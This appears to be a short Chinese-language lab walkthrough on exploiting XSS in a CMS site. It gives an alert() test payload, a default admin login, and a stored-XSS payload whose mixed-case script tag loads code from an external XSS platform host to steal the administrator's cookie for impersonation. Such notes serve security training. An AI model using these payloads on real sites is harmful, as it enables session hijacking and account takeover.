弹窗操作:证明漏洞存在
挖掘cms 网站XSS 漏洞
- 存在XSS风险地:收集用户输入的地方(搜索框,登录框,微博,留言板,聊天室)
<script>alert(/xss/)</script>
- 搜索框
- 留言板
点击后台管理登录:admin----123456
通过验证
回到首页,点击留言板发现一定会出现弹窗(存储型XSS)
利用XSS 平台盲打网站后台管理员Cookie
XSS平台:XSS Platform
<sCRiPt sRC=//xss.pt/ayKBKM></sCrIpT>
模拟管理员登录
- XSS平台
来到登录页面
刷新登录页面